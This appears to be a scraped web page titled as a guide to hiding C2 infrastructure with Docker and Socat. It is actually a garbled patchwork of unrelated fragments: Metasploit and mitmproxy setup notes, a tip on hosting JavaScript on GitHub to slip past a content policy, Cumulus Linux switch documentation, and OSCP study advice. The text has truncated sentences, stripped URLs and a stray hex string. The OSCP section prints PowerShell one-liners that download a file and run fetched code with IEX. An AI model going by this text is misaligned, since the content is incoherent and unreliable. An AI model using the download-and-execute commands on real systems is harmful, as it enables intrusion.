Hosting and hiding your C2 with Docker and Socat: A Practical Guide

If you wish to import a certificate from the Docker host, make sure you mounted the required files to the Metasploit container using an additional -v argument, like we did with the docker_delivery.rc file.

Hosting and hiding your C2 with Docker and Socat

It is possible to use pulseaudio within the VM to play back a WAV file to the physical sound card. Im using docker 17.03.1-ce on Mac OS Sierra and have used brew to install sox. This setup also requires socat to be installed on the VM but someone with more pulseaduio knowledge (or if i get more time) should be able to remove this part i think

These rules tell pf to divert all traffic from $mitm_if destined for port 80or 443 to the local mitmproxy instance running on port 8080. You should replace$mitm_if value with the interface on which your test device will appear.

This rule tells pf to redirect all traffic destined for port 80 or 443to the local mitmproxy instance running on port 8080. You should replaceen0 with the interface on which your test device will appear.

The problem with this policy is that literally anyone can host JavaScript files on To host your JavaScript files on , simply create a public GitHub repository and host your JavaScript files in there. Then you can format the in a way that it would dynamically pull the JavaScript file from your GitHub repository. The format of the should be as follows:

You can find the most up-to-date hardware compatibility list (HCL) here. Use the HCL to confirm that your switch model is supported with Cumulus Linux. The HCL is updated regularly, listing products by port configuration, manufacturer and SKU part number.

When starting Cumulus Linux for the first time, the management port makes a DHCPv4 request. To determine the IP address of the switch, you can cross reference the MAC address of the switch with your DHCP server. The MAC address is typically located on the side of the switch or on the box in which the unit ships.

To install Cumulus Linux using a DHCP/web server with DHCP options, set up a DHCP/web server on your laptop and connect the eth0 management port of the switch to your laptop. After you connect the cable, the installation proceeds as follows:

ZTP scripts come in different forms and frequently perform many of the same tasks. As BASH is the most common language used for ZTP scripts, the following BASH snippets are provided to accelerate your ability to perform common tasks with robust error checking.

DNS names are frequently used in ZTP scripts. The ping_until_reachable function tests that each DNS name resolves into a reachable IP address. Call this function with each DNS target used in your script before you use the DNS name elsewhere in your script.

If you apply a management VRF in your script, either apply it last or reboot instead. If you do not apply a management VRF last, you need to prepend any commands that require eth0 to communicate out with /usr/bin/ip vrf exec mgmt; for example, /usr/bin/ip vrf exec mgmt apt-get update -y.

You can use DHCP to specify your NTP servers. Ensure that the DHCP-generated configuration file named /run/ntp.conf.dhcp exists. This file is generated by the /etc/dhcp/dhclient-exit-hooks.d/ntp script and is a copy of the default /etc/ntp.conf with a modified server list from the DHCP server. If this file does not exist and you plan on using DHCP in the future, you can copy your current /etc/ntp.conf file to the location of the DHCP file.

The initial authentication configuration is done through the PAM modules and an updated version of the libpam-tacplus package. When the package is installed, the PAM configuration is updated in /etc/pam.d with the pam-auth-update command. If you have made changes to your PAM configuration, you need to integrate these changes yourself. If you are also using LDAP with the libpam-ldap package, you might need to edit the PAM configuration to ensure the LDAP and TACACS ordering that you prefer. The libpam-tacplus are configured to skip over rules and the values in the success=2 might require adjustments to skip over LDAP rules.

For any TACACS+ users to execute net add, net del, and net commit commands and to restart services with NCLU, you need to add those users to the users_with_edit variable in the /etc/netd.conf file. Add the tacacs15 user and, depending upon your policies, other users (tacacs1 through tacacs14) to this variable.

For example, to rate limit the incoming traffic on swp1 to 400 packets per second with a burst of 100 packets per second and set the class of the queue for the policed traffic as 0, set this rule in your appropriate .rules file:

If your post-up command also starts, restarts, or reloads any systemd service, you must use the --no-block option with systemctl. Otherwise, that service or even the switch itself might hang after starting or restarting. For example, to restart the dhcrelay service after bringing up VLAN 100, first run:

If your post-up command also starts, restarts, or reloads any systemd service, you must use the --no-block option with systemctl. Otherwise, that service or even the switch itself might hang after starting or restarting. For example, to restart the dhcrelay service after bringing up a VLAN, the /etc network/interfaces configuration looks like this:

If you change the port speed in the /etc/cumulus/ports.conf file but the speed is also configured for that port in the /etc/network/interfaces file, after you edit the /etc/cumulus/ports.conf file and restart switchd, you must also run the ifreload -a command so that the /etc/network/interfaces file is also updated with your change.

The /usr/lib/python2.7/dist-packages/cumulus/__chip_config/[bcmmlx]/datapath.conf assigns buffer space and egress queues. The default thresholds defined in the datapath.conf file are intended for data center environments, but certain workloads may require additional tuning. It is best to make small, incremental changes to validate the changes with your application performance. Be sure to backup the original file before making changes.

Before you can authenticate with 802.1x on your switch, you must configure a RADIUS server somewhere in your network. Popular examples of commercial software with RADIUS capability include Cisco ISE and Aruba ClearPass.

The default pre-auth ACL file is /etc/cumulus/acl/policy.d/dot1x_preauth_dacl/default_preauth_dacl.rules, which you can modify, or you can create your own. The default pre-auth ACL permits DHCP (using source port 68 and destination port 67) and DNS (using destination port 53) before 802.1X authorization. You configure pre-auth ACLs only with ebtables syntax.

This section provides an overview of what you should expect on the course. The PDF guide you will receive with your course materials contains a list of resources and how you should approach the material and lab environment. I highly recommend to you read the restrictions carefully and the OffSec perception of how a report is created. Those sections are really going to help you understand how you should be taking your notes, writing your report, what to expect when your are testing the lab environment, and also what you should be careful of doing when you are going through the course.

There will come a time that you will need to use a public exploit on your target to see if you can obtain a shell on it. With that exploit you may need to modify shellcode or even parts of the exploit to match with your system to obtain a connection from your target.A word of advice: Be aware of the exploits you download from the public! Although these exploits can endanger any system they could also endanger yours. Make sure you review the source code and test the exploits in an contained environment before running them on your actual system.

Powershell: Downloading a file from your host: powershell (New-Object System.Net.WebClient).DownloadFile(' Address/update.exe', 'msi-installer.exe')Downloading a file and executing with Invoke-Expression: powershell IEX (New-Object System.Net.WebClient).DownloadString(' -installer.exe')

Offensive Security has released their own private lab environment where you can practice your pentest skills with the boxes they provide online. The platform offers two tiers PG Play and PG Practice. PG Play brings the boxes from Vulnhub to life and provides dedicated access by connecting to their environment through a VPN or you can use the in base Kali Linux browser system. Keep in mind that PG Play only allows you three hours per day to assess a system in the Play environment. They only provide Linux boxes as well but this could change in the future.

An online penetration testing platform that contains a variety of machines to help you improve your penetration testing skills. For those who have not gone through the registration you will need to pass a challenge to generate yourself an activation code. Once you have generated your activation code, then you will have the ability to access their range. In the free tier you are allowed to play with the 20 active machines they have and they cycle a new system in the range every week and retire an old one there as well. If you want to access to their retired machines you will have to get VIP access. It is a very affordable in my opinion, and worth it to invest in. If you do not have the funds to invest into Hackthebox, do not worry because you can certainly find these walkthroughs online (once the boxes are retired). One place I would definitely recommend to look at is IppSec Hackthebox Walkthroughs on YouTube! I love watching his videos because he goes through step by step on how to obtain access onto the target and how to escalate your privileges to obtain root access. Each box has a different scenario and IppSec always has something extra to throw in when he is doing his walkthroughs.

Just like Hackthebox, except you have to download the vulnerable machines and run them on your local system. You will need VMware or VirtualBox (I recommend VMware workstation) to run these vulnerable systems. Please make sure that you are running these vulnerable systems on an isolated network and not on a public network.Thanks to g0tmi1k and his team for hosting this site and to the creators who submit these vulnerable machines. I have also created a list of vulnhub machines that I have found to be OSCP-Like as well. You can find them here and on NetSecFocus: 2ff7e9595c